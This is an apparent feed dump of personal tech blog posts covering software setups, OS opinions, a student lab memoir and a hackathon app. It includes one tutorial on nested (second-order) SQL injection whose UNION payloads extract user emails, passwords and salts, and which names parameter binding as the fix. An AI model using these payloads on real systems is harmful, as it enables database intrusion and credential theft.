If you have any queries, just file an issue on GitHub\nor contact me.",[],{"slug":2941,"title":2942,"link":2943,"pubDate":2944,"contentSnippet":2945,"tags":2946,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"aboard-the-nautilus","Aboard the Nautilus","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F09\u002F21\u002Faboard-the-nautilus\u002F","2013-09-21T00:00:00.000Z","I’d done a post on this a long time back (2009), detailing\nwhat software I use on a daily basis. This\nis an update to that post.\nSince the last post, I’ve moved on to using Linux, using\nElementary OS as my primary OS. Over the time period this post was written,\nI’ve shifted from using Cinnamon to Openbox and finally\nto elementaryOS’s pantheon as my Desktop Manager. I’m thinking of switching\nto Arch Linux, just to get a faster experience. I use\nSynapse as my application launcher, because it’s much faster\nthan anything else out there.\nFor most of my web browsing needs, I rely on Google Chrome Stable\nand a daily build of Chromium (v31 as of now) for most of my work.\nI switch between them all the time. I use Firefox (stable) only to\ntest out my projects from time to time.\nThe current editor I use is Sublime Text. It is\neverything you need, and much more. I’m yet to\nget started with its build system, and its\nplethora of packages; but it’s still an excellent\nchoice for a daily-use editor. On the command line, I use\nVim, git (with SCM Breeze), fasd and tig,\nwhich is an excellent git interface on the command line.\nI listen to music on my own browser-based music\nplayer, called Muzi, YouTube and GrooveShark.\nFor my terminal needs, I use Gnome-Terminal. I use\nByobu to manage my session, and often\nconnect to it from other computers as well. It’s an\nexcellent multiplexer that fits in my workflow\nreally well.\nI use Imo.im on both the\nDesktop and my tablet to chat. I occasionally use ReText\nfor editing markdown files. I use RedShift on my laptop and f.lux\non my iPad to help me sleep better. I recommend it to everyone who is\nsuffering from eye-strain or wants to sleep better.\nOn the browser, my most visited sites would be\nHacker News (via hckrnews.com), WorkFlowy for managing\nmy to-do list and GitHub on a daily basis for most of my projects.\nHardware\nI own an old Nokia X3-02, and will be upgrading to a Firefox OS Phone soon enough. I use a Dell Inspiron 1545 as my personal machine. I also use an iPad 2 (with 3G) on a daily basis (mostly for reading). I also own a Dayan Zhanchi 3x3 and a 5x5 shengshou\nspeed cube.\niPad Apps\nThe must-have iPad apps for me are Chrome, imo, and iBooks. I have installed Mailbox alongside GMail, and haven’t used GMail since\nI installed it. I sometimes write stuff using Plaintext, and sketch using Paper. I read my RSS feeds using Newsify and Feedly.\nExtensions\nChrome Extensions that I use on a daily basis include Chime for\nwonderful notifications (highly recommended), Ghostery for getting a tracker-free internet,\nHTTPS Everywhere to keep me secure, LastPass to manage passwords and Stylish\nfor customizing the looks of various websites.\nDream Setup\nMy dream setup would consist of a lightweight Ubuntu Laptop that I can carry around\nthat still has lots of processing power and battery life. 
I’ll pretty much be satisfied\nby any high-end Android phone as long as it has a decent battery life.",[],{"slug":2948,"title":2949,"link":2950,"pubDate":2951,"contentSnippet":2952,"tags":2953,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-i-still-recommend-windows","Why I still recommend Windows","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F07\u002F21\u002Fwhy-i-still-recommend-windows\u002F","2013-07-21T00:00:00.000Z","Even though I am a long-time Linux user, and a big-time fan of the many Linux distros that I’ve tried out over time, I still go around recommending Windows to people who ask me for advice. The only exception I make is when the person in question is a developer, in which case I try to convert them to the Church of Linux.\nThe main reason I recommend Windows to non-developers is because it is a far better operating system than most Linux distributions (for the general public). Now, before you bring out your pitchforks, hear me out.\nThe first and foremost reason that I give is that Windows sports a far better integration across all its services. Nautilus\u002FNemo in the Linux world do not reach the same level of integration that Windows Explorer does. For instance, just look at the way the “Send To” feature works in Explorer. To add a folder to the send to entry, you just have to add a shortcut to that folder inside the special “Send To” folder. On Nautilus, the equivalent would be going about installing an extension, and editing a configuration file by hand.\nOr take a look at how the “Play All” feature works in Explorer. Or the “Libraries” feature in Windows 7. Or the simple way that you handle file sharing in Windows. Even though Linux has (arguably better) Samba support for file sharing, you have to go about editing a handful of files to make it work. I personally find Apache easier to configure to just share files one way.\nGames are another reason. Even though Steam is available on Linux, all of the non-Valve triple-A titles are missing on Linux. Even though I continue to buy and play the Humble Bundles that offer Linux as a platform, I’m reminded of the stark reality every day when my friends ask me if I’ve played a recent title such as Call of Duty, Metro, NFS or even Swapper.\nThe next peeve that comes to my mind is the ridiculous driver support. It has been improving for a long time, but it’s still not there. Even Ubuntu needs to fetch proprietary drivers for my WiFi support on Broadcom, which needs an internet connection in the first place. This means I need to find a LAN connection to even start using Ubuntu. Similarly, the pain I had to go through to install Ralink network drivers on a friend’s laptop was immense. I can never use circular scrolling or touchpad zoom on my laptop in Linux because there are still no drivers available anywhere for it. And don’t get me started on UEFI boot issues. No matter what people believe or pretend, hardware support is just not good enough to be relied on in the Linux world. As a side note, I haven’t synced my iPad in Ubuntu since I shifted to iOS 5, and Apple driver support on Linux will remain abysmal forever just because iTunes will never be released for Linux. The last version of iOS that had music sync support (via libimobiledevice) was iOS 4.0 (released 3 years ago in June 2010).\nNext I want to point out the upgrade pain that everyone has to go through. It’s like a constant rite of passage, which turns a Linux noob into an actual user. 
I am yet to do an Ubuntu upgrade that went smoothly and didn’t break a thing; and I’ve been upgrading my Ubuntu since 10.04 was released. The upgrade tag on askubuntu is chock full of horror stories.\nAnother thing that frustrates me to no end is that the Ubuntu Dash, and the GNOME Overview are both slow as hell. I’m currently using Cinnamon, which is faster than both of these, but still an order of magnitude slower than the Windows Start Menu. Synapse is better, but cannot be set as the default.\nI was using Windows 7 on my cousin’s laptop these last few days and I remembered the favourite app that I used to no end: Everything. It is the quickest file search I’ve ever used. The alternatives in the Linux world are Synapse, Zeitgeist, and the plain old locate command. The only issue is that I have to run updatedb manually, while Everything was always up to date, using the NTFS File Journal. To this day, I am yet to find a good enough alternative to Everything.\nIt is true that Windows lacks many of the good things that Linux distros provide, such as the excellent package management support, POSIX compatibility, and the plethora of tools we get on the command line; but at the same time, it is also a better operating system for most of the masses. I’ll continue to recommend Windows to all my non-developer friends till “The year of Desktop Linux” arrives.",[],{"slug":2955,"title":2956,"link":2957,"pubDate":2958,"contentSnippet":2959,"tags":2960,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"sdslabs-personal-blog-post","SDSLabs - My experiences","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F12\u002F27\u002Fsdslabs-personal-blog-post\u002F","2012-12-27T00:00:00.000Z","Introduction\nFor the past two years, I have been involved in a student group in our campus called SDSLabs.\nIt has been the most fun two years of my life. I have acted as programmer, developer, manager,\nmonkey-coder, event-manager and all other roles one might expect in a startup. However, I have\nnever really blogged about any of this. Someone pointed it out to me recently; the truth is I\nhave been meaning to write this for a very long time, but it’s kind of hard to put down in\nwords. I’ll try my best. This post is highly specific to IIT Roorkee (you have been warned).\nChronology Of Events \u002F Timeline\nBack in my first year, after joining something called SDS as a proficiency in the campus, I was learning PHP.\nWith no-one to guide me, I had only attended a single talk by Shobhit Singh where he talked about dynamic\nwebsites. I was instantaneously hooked. I did something called lion, a twitter clone, and it won 3rd prize\nin Srishti. It had follow, unfollow, messages, tweets, and groups (one feature which set it apart from twitter).\nThe code was a mess of php and inline html, and I have never looked upon it since. I did a couple more projects by myself,\nlearning the ins and outs of php (I was yet to hear about ruby\u002Fpython). At the end of my first year, I did a project\nmanagement system under Kumar Shashank, who taught me about MVC and the need for architecture in a software application.\nAt the very end of the project, a group called SDSLabs was formed. Along with a few people\nShobhit sir had found, we founded SDSLabs. Everyone in the group was passionate about building things.\nAnd somehow, magically, I was in it. 
And there began the most beautiful chapter of my life…\nCoding & Learning\nAfter completing the PMS (Project Management System), I moved on to work on Filepanda, and then the entire framework\napplication for SDSLabs. All our applications are powered by a single API, which I wrote. Meanwhile, Harshil was working\non DC++, and other awesome things. I met Pranav sir, and was introduced to the thousand-quirks-of-css. We shifted to Mint, and\nthen to Ubuntu. I learned the ins and outs of managing a Linux system. Back then SDSLabs was limited to the small committee\nroom in Hobbies Club (with Shobhit Sir working tirelessly on funding for a better lab).\nAnd I met Ishan Sir. If you are reading this, thank you for teaching me how to learn. I had tons of night-outs with him\ndiscussing things I barely remember now. I became a creator. I executed on tons of ideas. Most never saw the second day in\ntheir lives, but I still have them with me, as a memento of the past and what was to be. Ishan Sir was a gold-mine for learning.\nEverything I could ever ask, and he’d hand over a resource. Some of my most productive learning days were spent with him.\nRecruitments\nAfter a single semester of work, we held our first recruitments. I wrote my\nfirst blog post for the lab at the time noting\ndown my amazing reaction to the awesome people that had joined the lab.\nIt is difficult to distil into words the awesome learning experience I had with all these people. Going to chapos, thinking\nabout how we could expand. What other awesome stuff could we do? One-night hackathons, where we coded awesome stuff.\nAnd I started to work on Muzi, which was to be my application. It stands at 811 commits today, with over\n200 issues in our project management system.\nI went into the development knowing PHP and bits of AJAX, and came out a JQuery fanboy. Muzi has been my primary music player\nfor almost a year now. It feels awesome to listen to music on a music player you coded. The initial version was\nbased on Zune’s design on Windows. We kept on improving it till it was exactly what we wanted. Today, people have listened to\nalmost 1 lakh songs on Muzi, and it feels awesome to have been behind something that is so widely used (within the campus).\nLaunch\nThe next semester involved our actual launch (11-11-11) of all our applications.\nWe had all converted into semi-breathing coding machines cum zombies by that time though. Sleepless and exhausted, we did prevail,\nand launched a few hours early. The Launch was appreciably received in the campus, although I had to leave for the\nDeloitte CCTC Contest the very same day (which we won!).\nI ended up doing a rewrite of Codematics (codename CodeBot) in node for the launch. It has a geeky, command-line interface\nwhich was inspired by goosh and xkcd’s unix interface. Along with that, Muzi was\nlaunched to huge appreciation as well.\nRecruitments Again\nThis was the semester where our group actually expanded. Our count is almost 42 now, and nothing could\nmake me more glad than actually being with all these people.\nI donned lots of hats: teaching, guiding, coding, and managing people. Linux became one of my top skills, and I learnt a lot.\nWe shifted to Redmine for management, and I ended up doing a lot of server-administration related stuff (gitolite, redmine, vhosts,\napache, varnish, etc.).\nIt has almost been a year since our last recruitment. We have been working on tons of things; some of which\nwill be launched soon. 
I took lectures on topics as far apart as\n“Usability Designing” and\n“Software Development 101” (https:\u002F\u002Fspeakerdeck.com\u002Fcaptn3m0\u002Fsoftware-development-101). I mostly\nworked on internal features, improving our API, and something called Presence. We also\nparticipated in\ntwo hackathons,\nand we won both of them.\nWhere, now?\nOur group is still nascent, and I have not mentioned every project that the group (or even I) have\ndone, for fear of making this post too long. That itself speaks volumes about what we’ve done in a short\nspan of two years. Our tagline reads “iDream. iCode. iInnovate”. I wish for the group to continue on that\npath. Develop things that make life easier; for everyone around the world.\nPeople\nThroughout this journey, there have been lots of people, without whom this blog post would never have been written.\nYou all know who you are. Keep being awesome.\nSkills\nI used to call myself a programmer, but now I’m in a more management-esque role in SDSLabs. It’s my share of the work to manage projects,\nand track progress. That does not mean that I’ve given up coding, and I still do code a lot for our internal projects. I have also become\nsomewhat of a UX enthusiast, taking care of most UX work done in the lab. I have also found myself becoming an avid learner, and have Ishan\nSir to thank for that.\nAnecdotes & Stories\nThis post already reads more like a things-i-did-at-sdslabs, which is something I was hoping to avoid, instead of why-i-love-sdslabs, which is what I wanted. So I’m gonna stick to a few moments and events that stand out to me…\nWe have a board with three defining people on it: Steve Jobs, Dennis Ritchie, and Linus Torvalds.\nWe have had mind-blowing pizza chapos. So many pizzas that they were brought in 2 rickshaws from dominos. Yup.\nI am known as the bot in lab. Mostly because of my highly rational unemotional responses, and other things. There is another person, who is trying to get that title, though.\nI am famously known for turning down “writing a letter that could have fetched us lots of funding” for coding instead. (In my defense, there were other people who could have handled it better than me, and we didn’t need it badly at the time)\nAlmost every group in the campus describes their group as a second home. But in our case it is partially true. We spend almost all our free time in lab. I spent close to 500 hours in the lab in this semester alone. Where does all this time go? Talking, discussions, development, teaching, lectures among other things.\nSDSLabs feels more like a startup than an actual student group to me (and Shashank as well). We have to fight for our funding, manage people, and develop products.\nI have done way too much copy-editing to be called “just a developer” anymore. I have spent hundreds of hours fighting Pinta and its numerous bugs.\nIt has been a great experience working with all these people. I can just hope that the group keeps moving to better\ninnovation, and grander ideas in the future. We are recruiting from the first year this coming January. If SDSLabs feels like a place you’d\nenjoy, just come over and take our test. 
It changed my life, maybe it will change yours too.",[],{"slug":2962,"title":2963,"link":2964,"pubDate":2965,"contentSnippet":2966,"tags":2967,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-i-m-moving-from-outlook","Why I'm leaving outlook.com","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F12\u002F22\u002Fwhy-i-m-moving-from-outlook\u002F","2012-12-22T00:00:00.000Z","I’d been one of the most eager users of the new outlook.com redesign.\nI’m a real fan of Metro (sorry, I must call it the New Windows 8 Design),\nand think that the correct typography mixed with the correct design language should help the users in a great way going forward.\nUnfortunately, outlook.com is not there yet. The application was made to resemble the Windows Mail app in Windows 8, with 3 tiles per screen. On Windows, the application works in 1\u002F2\u002F3 width modes differently. It changes its navigational strategy to allow you to browse your emails easily. While this could have been easily accomplished using responsive design techniques on the web, outlook does not use it and loses sorely needed functionality.\nThe typography of the app is horribly broken, especially in Linux. The font of choice for the app is Calibri, which is missing in Linux, and as such, uses the default system font from the browser. The font sizes are inconsistent, and the application shortcuts are horrible, even though I am using the GMail shortcuts option.\nThe “Insert Link” option is horribly designed. It does not respond to enter keys, and has no place to add “Text” for the link either.\nThere is no mechanism for quoting messages properly at all. There is nothing like a Conversation View, and I have to waste large amounts of time just to figure out what was newly added in the reply to my own mail. As such, this becomes largely cumbersome to keep up with.\nThe archive option from GMail (which keeps my inbox clean) is notably missing as well. (Update: This was added later, with the\nability to use archive to move to any custom folder)\nThe “Active View”, which seems to be a quick preview mode, only works on Windows, because it uses Silverlight. I tried using\nMoonlight (Silverlight’s OSS clone for Linux), but it seems that Active View uses new Silverlight features. Hence, I can\nonly download pics from Outlook, and not browse them online (which is a huge pain-point for me).\n\u002FRant",[],{"slug":2969,"title":2970,"link":2971,"pubDate":2972,"contentSnippet":2973,"tags":2974,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"parallels","Parallels","https:\u002F\u002Fnadh.in\u002Fblog\u002Fparallels\u002F","Tue, 18 Dec 2012 00:00:00 +0000","A sci-fi short story inspired by Isaac Asimov’s “The Last Question”.\nMunic hurried along the dimly lit corridors of the C-wing of the Neutrino lab. It was past midnight, and he had received an alert on his phone sent by one of the monitoring terminals. His palms and brows were trickling sweat despite the unusually cold night. 
His off-white Oxford shirt was unevenly buttoned and lazily tucked in, but he didn’t seem to notice, or for that matter, care.",[],{"slug":2976,"title":2977,"link":2978,"pubDate":2979,"contentSnippet":2980,"tags":2981,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"e0-b4-85-e0-b4-a3-e0-b5-8d-e0-b4-a3-e0-b4-be-e0-b4-b0-e0-b4-95-e0-b5-8d-e0-b4-95-e0-b4-a3-e0-b5-8d-e","അണ്ണാരക്കണ്ണന്‍മാര്‍","https:\u002F\u002Fnadh.in\u002Fblog\u002F%E0%B4%85%E0%B4%A3%E0%B5%8D%E0%B4%A3%E0%B4%BE%E0%B4%B0%E0%B4%95%E0%B5%8D%E0%B4%95%E0%B4%A3%E0%B5%8D%E0%B4%A3%E0%B4%A8%E0%B5%8D%E0%B4%AE%E0%B4%BE%E0%B4%B0%E0%B5%8D\u002F","Wed, 15 Aug 2012 00:00:00 +0000","Squirrels, whose numbers have fallen by more than 80 percent\nover the last three years, are now facing the threat of\nextinction (Mathrubhumi, 15 August). Hearing that the squirrel,\nonce a regular sight all over Kerala, is disappearing\nbrings first shock, then sorrow :(",[],{"slug":2983,"title":2984,"link":2985,"pubDate":2986,"contentSnippet":2987,"tags":2988,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"chrome-ios","Things I expect in a Chrome\u002FiOS update","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F07\u002F14\u002Fchrome-ios\u002F","2012-07-14T00:00:00.000Z","I’ve changed to using Chrome for iOS as my primary browser. Since I only own an iPad 2, all of my observations are with regard to the iPad version of the browser.\nWhy I love Chrome\nChrome is already my primary browser on my primary machine, and after it came out for the iOS, I tried it out hesitantly, but to my surprise (contrary to what the internet says) it is working out even better than expected.\nAbility to sync tabs across my laptop and tablet. I can leave my laptop and continue reading on the go. I don’t own a Mac, so I can’t comment against how Safari\u002FiCloud does it, but it works well enough for me.\nAll my desktop bookmarks (and bookmarklets) are available and functioning instantly.\nOmnibox is awesome, and saves me a lot of trouble, looking in my history, bookmarks, and pre-fetching stuff. This was the most important feature that Chrome v1 brought along with it (when it was released in Windows), and it’s nice to find it working exactly as intended.\nIncognito Mode (I previously used Dolphin in private mode, but this is far better).\nComplete bookmark listing while creating a new bookmark. Unlike Desktop version of Chrome, which only shows 5 most recently used folders. I bookmark stuff extensively, and it makes the process much easier for me than on the desktop version, ironically. See Image for Comparison\nTab Switching is brilliant. It seems to be inspired\u002Fcopied straight from Paper, but it is executed well enough for me. It gets better once you get used to it. The tab bar itself is scrollable as a plus (you can hide\u002Funhide tabs). I’ve read people complaining about this, but it helps me browse on the ipad one-handed.\nIt feels fast, especially after continuous use. I don’t know if it’s the ported networking stack, or better caching, but page load speeds are better than Safari for me in general.\nNote: If you have a jailbroken device, you can set up Chrome as your default browser using BrowserChooser from Cydia. The best part is that home-screen shortcuts open in Chrome as well. I’ve ditched the Facebook App for a shortcut icon to touch.facebook.com as a result.\nThings I want\nSupport for configurable search engines. 
I use them extensively (e.g. duckduckgo, google lucky search, amazon, ebay, github, stackoverflow and even google mobile search). The pre-defined search engines are of no use to me (Bing\u002FYahoo\u002FGuruji).\nFind in Page. This is a no-brainer. Edit: This is available via Chrome Customizer in Cydia for a jailbroken device.\nAbility to turn off images\u002Fjavascript (Content Settings). I’m not sure if it will be possible w\u002Fo proxying like how Opera does, but this would be nice to have (since people might want to save bandwidth on 3g).\nSupport for emailing an entire page (rendered).\nUserScript support. I don’t know if apple would allow it at all, but I think the Apple ToS disallows code to be downloaded. What if there were some sort of linking support to allow me to insert some external script tag?\nReadability\u002FiReader-like support. The safari readability link does work wonders. This could be simulated with a bookmarklet, but once again calling them is hard. Update: ChromeCustomizer can do this via settings menu (see below).\nBetter access to bookmarks\u002Fbookmarklets. At least show me the mobile bookmarks so I can keep them separate.\nWait a bit more before taking the page snapshot for the speed-dial. The GMail snapshot has always been blank for me. At least check if the snapshot is completely blank, and wait a bit more if that is the case.\nApp shortcuts. The kind you get for almost all websites on Chrome Webstore. I think they are referred to as “Chrome Apps” against “Extensions”, which would be completely disallowed as per Apple ToS. Since Apps are just shortcuts and some icons, they should be allowed in some manner.\nBetter history support. Seeing just the last 6 closed tabs kind of sucks. Give me some real history browser (and improve the one in desktop chrome while you’re at it).\nMailto support (for gmail etc). Don’t know if possible, but would be nice to have.\nSelection Mailing. Just let me select and mail some HTML.\nHandle pdfs better. By default chrome redirects to Safari for pdfs. After changing Chrome to default, it does handle pdfs fine, but I miss the “Open In iBooks” link. Don’t see this happening though. (Update: This was fixed in a Chrome Update)\nWebintents support would be nice to have (via something other than chrome Webstore, I guess)\nCloudPrint support. I don’t use this, but I am assuming there are people who do.\nFullScreen support of some sort. Safari in iOS 6 is bringing this much-asked-for feature, so there are people who would love to have this. Chrome’s faster tab switching should help it out with some of the Full Screen issues. (Edit: This is available via a three finger tap if you install Chromizer from Cydia’s ModMyi repo). Chromizer also forces the iPhone style tab switching on the iPad as a side-effect.\nThere is also a ChromeURL tweak available for Jailbroken devices that changes the keyboard layout to the one used for the address bar in Safari (the so-called tld keyboard).\nAnother one called ChromeCustomizer offers the following:\nAdds one bookmarklet to the settings menu. I’m using Readable at present.\nAdds a broken fullscreen implementation (maybe it is clashing with Chromizer) via the Menu. I prefer Chromizer’s 3 finger tap for fullscreen.\nAdds a Find in Page feature. 
Update: This is now available\nAdds some filtering for ads\u002Ftracking websites.\nAdds an option to change Chrome tab switching mode (iPhone vs iPad).\nSee this blog post for some more tweaks available on Cydia.",[],{"slug":2990,"title":2991,"link":2992,"pubDate":2993,"contentSnippet":2994,"tags":2995,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"nested-sql-injections","Nested SQL Injections","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F06\u002F09\u002Fnested-sql-injections\u002F","2012-06-09T00:00:00.000Z","I recently did something along this line, and this technique is really cool. (I prefer to call it “inception” injection). It’s pretty easy once you figure it out, so here goes.\nIf the result of the first query is used as an input in the second query, and the first query is vulnerable, we can use the output as an “input variable” in the second query itself. This would be useful in places where the second query has a better display method than the first one (for instance length restrictions).\nQuery 1:\nSELECT * FROM users WHERE email='$email' AND password = '$pass'\n\n\nThis query is usually accompanied with:\n\u003C?php\n$_SESSION['email'] = $row['username'];\n\n\nQuery 2:\nAssuming something like a profile page:\nSELECT * FROM user_details WHERE email='{$_SESSION['email']}'\n\n\nInjection\nInjecting the first query (basic)\nSELECT * FROM users WHERE email='user@email.com' # AND password=''\n\n\nEverything after # should be treated as a comment. Henceforth, I would not write stuff after # for brevity.\nThinking backwards, we could create a custom query for user_details:\nSELECT * FROM user_details WHERE email='' UNION SELECT * FROM user_details #\n\n\nThis would show the details of the first user in the profile page. Let’s think a bit larger:\nSELECT * FROM user_details WHERE email='' UNION SELECT GROUP_CONCAT(email), GROUP_CONCAT(password) FROM user_details #\n\n\nUsually, this won’t work (different number of columns in results). You’d have to use ORDER BY to guess the number of columns. Writing only the UNION part now:\nUNION SELECT * FROM user_details ORDER BY 1 #\nUNION SELECT * FROM user_details ORDER BY 2 #\nUNION SELECT * FROM user_details ORDER BY 3 #\nUNION SELECT * FROM user_details ORDER BY 4 # -- Gives Error\n\n\nSo we realize that user_details has 3 columns. Coming back, we could do:\nUNION SELECT GROUP_CONCAT(email), GROUP_CONCAT(password), 3 FROM users #\n\n\nThat would give us details up to 1000 characters (GROUP_CONCAT limits). To mitigate those limits (note that MySQL requires an alias on the derived table):\nUNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) AS t\n\n\nChange the OFFSET and you’re ready to roll.\nInception Injection\nThis was all a theoretical attack on the second query. Granted you could do lots of stuff from here on the first query, but it is far less responsive (Doesn’t give much output). The only thing you can modify is the email, which offers you a single field.\nHowever, the only attack vector ($_SESSION) for the second query is not directly controlled, but comes instead from the result of the first query. 
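To make that data flow concrete before building the payload, here is a minimal runnable sketch of the same two-query pattern. It is not the original PHP app; it uses Python's sqlite3 purely for illustration (and relies on SQLite's legacy double-quoted-string fallback for the inner payload):

import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users (email TEXT, password TEXT);
    CREATE TABLE user_details (email TEXT, name TEXT, bio TEXT);
    INSERT INTO users VALUES ('user@email.com', 'secret');
    INSERT INTO user_details VALUES ('user@email.com', 'User', 'hi');
""")

def login(email, password):
    # Query 1: vulnerable string interpolation.
    row = db.execute(
        "SELECT * FROM users WHERE email='%s' AND password='%s'"
        % (email, password)).fetchone()
    return row and row[0]          # plays the role of $_SESSION['email']

def profile(session_email):
    # Query 2: trusts the session value, so anything smuggled through
    # query 1's result set gets injected here (second-order injection).
    return db.execute(
        "SELECT * FROM user_details WHERE email='%s'" % session_email
    ).fetchall()

# The first query's UNION makes its *result* an injection string for
# the second query -- the "inception" step described in this post.
payload = "' UNION SELECT \"' UNION SELECT email, password, 'x' FROM users --\", 2 --"
session_email = login(payload, "anything")
print(profile(session_email))   # leaks users.email / users.password

The fix for both steps is the same: bind parameters (db.execute(query, (value,))) instead of interpolating strings, including for values that were previously read out of the database.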
So to perform this attack on the second query, we take the second injection, and use it inside the first one.\nSELECT * FROM users WHERE email='' UNION SELECT * FROM users # -- will give us first user\nSELECT * FROM users WHERE email='' UNION SELECT * FROM users  ORDER BY 1 # -- keep increasing to get number of columns\nSELECT * FROM users WHERE email='' UNION SELECT 1,2,3 FROM users # -- This would let us know which column corresponds to the email id\nSELECT * FROM users WHERE email='' UNION SELECT \"\u003Cinject second query here>\",2,3 FROM users # -- now inject the second query's payload into the email column\n\n\nAlthough we have been writing injection code starting with UNION, it actually would start with ‘ UNION… Using our last injection code for the second query here, it becomes:\nSELECT * FROM users WHERE email='' UNION SELECT \"' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) AS t #\",2,3 FROM users #\n\n\nWhat happens on the server side:\n\u003C?php\n\t$_SESSION['email'] = \"' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) AS t #\"\n\n\nand the second query becomes:\nSELECT * FROM user_details WHERE email='' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) AS t #\n\n\nNote that we still have to keep a # at the end of the inner query. There are portions after # which we still need to discard. Feel free to contact me if you have any further doubts. I am sure this is well-known and used by people already, but this was something new to me.",[],{"slug":2997,"title":2998,"link":2999,"pubDate":3000,"contentSnippet":3001,"tags":3002,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"phonegap-blog-post","Akira - Winning entry to the Adobe Express Apps Contest","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F05\u002F23\u002Fphonegap-blog-post\u002F","2012-05-23T00:00:00.000Z","This is the obligatory blog post that comes along with winning the Adobe Express Apps Contest.\nContest Rules\nThe contest rules asked you to develop a mobile application, using Adobe Phonegap and related technologies (read Dreamweaver) in a time frame of hardly 18 hours. This duration was assuming that one does not sleep, which I did not.\nThe problem statement for the application was to create a mobile application for an SUV manufacturer. The application had to be socially engaging and use the hardware capabilities offered by the device.\nOur Interpretation\nWe started with the problem statement as the complete guide for our application, and worked bottom-up towards an app that would take the least amount of work while best fulfilling the requirements.\nWe started off with a few wireframes, and features thrown around. At the end of the one hour mark, we had our feature list down to:\nOwners can share pics of their cars. We wanted the application to be for the owners of the cars, which brings in a lot of additional data. Pic sharing was the most logical thing to do. We were thinking something like an Instagram Community where everybody posts pics about where they have been, their rigs and so on.\nA mileage meter. This was a slight gamification of the GPS data that we get. 
At the start of every journey\u002Ftrip, you could mark it as such in the app, and we would record your position every 5 minutes. At the end of the trip, you could mark your ending point and see how much you travelled. Also important was the fact that we decided to show a number corresponding to every application user, showing how many miles he\u002Fshe has travelled so far. Seeing that the next guy has travelled only so and so more miles than you may lead you to travel more.\nMaps, obviously. A map for all the previous journeys that you have taken.\nWork\nWe tried to start with JQ.Mobi, which is an alternative to Jquery Mobile, but could not justify it, and switched to JQuery Mobile as it offered better integration with Dreamweaver.\nThe basic application layout was done using a mix of JQuery Mobile and some custom css. I came across a very good service called PhoneGap Build, which allows you to compile your Phonegap application online to different platforms. We started with basing our application on the Phonegap Starter App on GitHub which was quite good. The examples directory in the phonegap download is what we ended up using, though.\nEdit: After working a lot more in mobile development, I have come to see a lot more frameworks, and find JQTouch to be quite the minimalist do-one-thing-well plugin.\nThe most difficult part was to get the application to compile for iOS, without paying for the Apple Developer Licence. Since I could not see myself selling iOS apps anytime soon in the Apple App Store, I was stuck with a jailbroken iPad + iPod Touch, and had to figure out how to compile.\nThe steps, which took me a lot of time to find on the internet, include:\nDownload and install Xcode and the Adobe Phonegap toolkit. I downloaded the latest version, 4.2 of Xcode, which makes the process a bit easier.\nFollow the instructions on this youtube video to allow Xcode to compile your application without Code Signing.\nCreate a Cordova application in Xcode and follow these instructions to add the www folder to the application.\nCompile. If you have an iDevice connected, you should be able to compile and install your application in a single step.\nYou may need to change your application configuration to “Do not code sign” for this to work.\nGetting all the above steps to work for the first time, on a borrowed MacBook Pro, was a lot of work for a Mac noob like me. But at the end, getting to see the application getting launched on multiple devices and looking equally good was worth it.\nThe rest of the time was spent on getting the application features to work, while fighting off sleep. The end result was a still-incomplete application, which ran on multiple devices.\nBlackberry\nUnfortunately, we were not able to run the app on the only Blackberry Phone that we had as Phonegap only supports Blackberry 5 as of now, while our phone had been upgraded to 6.\nOur winning strategy from the start had been to dazzle the judges with an application running across multiple devices, and working equally well. We were pretty sure that none of the other contestants would put in so much effort to get it to run on non-android devices.\nBackend\nI wrote the application backend in PHP limonade, a framework that I am quite used to. The concept was to expose a REST API that the application could use to authenticate users and carry out backend tasks.\nCode\nThe code is obviously messy, as a result of being hacked in on a single 18-hour marathon. You may be able to get a few good ideas from the implementations, though. 
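As a back-of-the-envelope illustration of the mileage-meter idea described above (not the contest code), the trip distance can be approximated by summing great-circle distances between the periodic GPS fixes. A sketch in Python using the haversine formula:

from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two (lat, lon) points, in km."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = (sin((lat2 - lat1) / 2) ** 2
         + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))

def trip_distance_km(fixes):
    """Sum the leg distances between consecutive GPS fixes."""
    return sum(haversine_km(*a, *b) for a, b in zip(fixes, fixes[1:]))

# e.g. a short trip sampled every 5 minutes
print(trip_distance_km([(28.61, 77.21), (28.70, 77.10), (28.80, 77.00)]))

Sampling every 5 minutes slightly under-counts (the path between fixes is assumed straight), which is a reasonable trade-off against battery drain from continuous GPS polling.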
